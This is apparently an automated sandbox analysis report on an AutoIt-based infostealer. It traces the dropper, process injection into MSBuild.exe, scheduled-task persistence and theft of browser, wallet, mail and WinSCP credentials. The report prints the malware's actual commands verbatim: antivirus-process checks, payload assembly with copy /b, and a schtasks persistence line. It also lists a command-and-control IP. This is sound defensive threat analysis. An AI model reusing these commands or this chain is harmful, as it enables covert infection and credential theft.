                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C0F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C15CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C1C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C224Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C288Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134C2ECJump to behavior
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00781B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,28_2_00781B4D
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0072338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_0072338B
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078BBED SendInput,keybd_event,28_2_0078BBED
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078EC6C mouse_event,28_2_0078EC6C
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Users\user\AppData\Local\Temp\update.exe "C:\Users\user\AppData\Local\Temp\update.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Expensive.pps Expensive.pps.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 611485Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Experts.ppsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Gd" Investigations Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 611485\Heroes.com + Closely + Sad + Sandwich + Legends + Labor + Mailing + Jersey + Dies + Disabled + Technical 611485\Heroes.comJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Utilize.pps + ..\Expenditure.pps + ..\Hacker.pps + ..\Sexually.pps + ..\Forbes.pps + ..\Taught.pps + ..\Champion.pps + ..\Eclipse.pps + ..\Plants.pps + ..\Ed.pps + ..\Midnight.pps HJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Heroes.com HJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com" "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,28_2_007814AE
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00781FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,28_2_00781FB0
                  Source: Heroes.com, 00000013.00000003.2380255265.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Heroes.com, 00000013.00000000.2365924382.0000000000523000.00000002.00000001.01000000.0000000A.sdmp, GuardianCryptoScan360.com, 0000001C.00000000.2423457527.00000000007E3000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: GuardianCryptoScan360.comBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00740A08 cpuid 28_2_00740A08
                  Source: C:\Users\user\Desktop\00000123.exeQueries volume information: C:\Users\user\Desktop\00000123.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0077E5F4 GetLocalTime,28_2_0077E5F4
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0077E652 GetUserNameW,28_2_0077E652
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_0075BCD2
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,6_2_00406805
                  Source: C:\Users\user\Desktop\00000123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Discord Token Stealer
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Yara detected Generic Stealer
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrumk
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty!
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q1C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q=C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,]q6C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: InstallUtil.exe, 0000001D.00000002.3386046189.000000000440D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: GuardianCryptoScan360.comBinary or memory string: WIN_81
                  Source: GuardianCryptoScan360.comBinary or memory string: WIN_XP
                  Source: GuardianCryptoScan360.com, 0000001C.00000000.2423457527.00000000007E3000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: GuardianCryptoScan360.comBinary or memory string: WIN_XPe
                  Source: GuardianCryptoScan360.comBinary or memory string: WIN_VISTA
                  Source: GuardianCryptoScan360.comBinary or memory string: WIN_7
                  Source: GuardianCryptoScan360.comBinary or memory string: WIN_8
                  Source: Yara matchFile source: 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Discord Token Stealer
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Yara detected Generic Stealer
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,28_2_007A2263
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,28_2_007A1C61

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information212
                  Scripting                  		2
                  Valid Accounts                  		41
                  Windows Management Instrumentation                  		212
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		12
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		2
                  Valid Accounts                  		2
                  Valid Accounts                  		21
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		3
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		21
                  Access Token Manipulation                  		21
                  Software Packing                  		NTDS48
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		1
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                  Registry Run Keys / Startup Folder                  		212
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets161
                  Security Software Discovery                  		SSH4
                  Clipboard Data                  		2
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job                  		111
                  Masquerading                  		Cached Domain Credentials71
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		DCSync4
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job71
                  Virtualization/Sandbox Evasion                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                  Process Injection                  		Network Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1628000 Sample: 00000123.pif Startdate: 03/03/2025 Architecture: WINDOWS Score: 100 83 kurNPdkiGq.kurNPdkiGq 2->83 85 78.210.14.0.in-addr.arpa 2->85 87 bg.microsoft.map.fastly.net 2->87 91 Multi AV Scanner detection for submitted file 2->91 93 Yara detected Generic Stealer 2->93 95 Yara detected Discord Token Stealer 2->95 97 13 other signatures 2->97 11 00000123.exe 6 2->11         started        15 wscript.exe 2->15         started        17 wscript.exe 2->17         started        signatures3 process4 file5 69 C:\Users\user\AppData\Roaming\...\updatte.vbs, ASCII 11->69 dropped 71 C:\Users\user\AppData\Roaming\updatte.exe, PE32 11->71 dropped 73 C:\Users\user\AppData\Local\Temp\update.exe, PE32 11->73 dropped 115 Drops VBS files to the startup folder 11->115 117 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->117 119 Drops large PE files 11->119 19 update.exe 24 11->19         started        21 cmd.exe 1 11->21         started        24 InstallUtil.exe 11->24         started        26 cmd.exe 11->26         started        121 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->121 28 GuardianCryptoScan360.com 17->28         started        signatures6 process7 signatures8 30 cmd.exe 2 19->30         started        99 Drops PE files with a suspicious file extension 21->99 101 Uses schtasks.exe or at.exe to add and modify task schedules 21->101 103 Uses ipconfig to lookup or modify the Windows network settings 21->103 33 conhost.exe 21->33         started        35 ipconfig.exe 1 21->35         started        105 Found many strings related to Crypto-Wallets (likely being stolen) 24->105 37 WerFault.exe 24->37         started        39 conhost.exe 26->39         started        41 ipconfig.exe 26->41         started        process9 file10 81 C:\Users\user\AppData\Local\...\Heroes.com, PE32 30->81 dropped 43 Heroes.com 4 30->43         started        47 cmd.exe 2 30->47         started        49 cmd.exe 1 30->49         started        51 10 other processes 30->51 process11 file12 75 C:\Users\user\...behaviorgraphuardianCryptoScan360.com, PE32 43->75 dropped 77 C:\Users\user\...behaviorgraphuardianCryptoScan360.js, ASCII 43->77 dropped 123 Drops PE files with a suspicious file extension 43->123 125 Writes to foreign memory regions 43->125 127 Injects a PE file into a foreign processes 43->127 53 MSBuild.exe 43->53         started        57 cmd.exe 43->57         started        59 schtasks.exe 43->59         started        61 MSBuild.exe 43->61         started        79 C:\Users\user\AppData\Local\Temp\611485\H, data 47->79 dropped signatures13 process14 dnsIp15 89 51.81.129.243, 49974, 49975, 7702 OVHFR United States 53->89 107 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 53->107 109 Tries to steal Mail credentials (via file / registry access) 53->109 111 Found many strings related to Crypto-Wallets (likely being stolen) 53->111 113 2 other signatures 53->113 63 conhost.exe 57->63         started        65 schtasks.exe 57->65         started        67 conhost.exe 59->67         started        signatures16 process17

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  00000123.exe24%ReversingLabsWin32.Trojan.CrypterX

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\611485\Heroes.com0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalse
                    		high
                    s-part-0032.t-0009.t-msedge.net
                    		13.107.246.60
                    		truefalse
                      		high
                      kurNPdkiGq.kurNPdkiGq
                      		unknown
                      		unknowntrue
                        		unknown
                        78.210.14.0.in-addr.arpa
                        		unknown
                        		unknowntrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.cloudinary.com00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
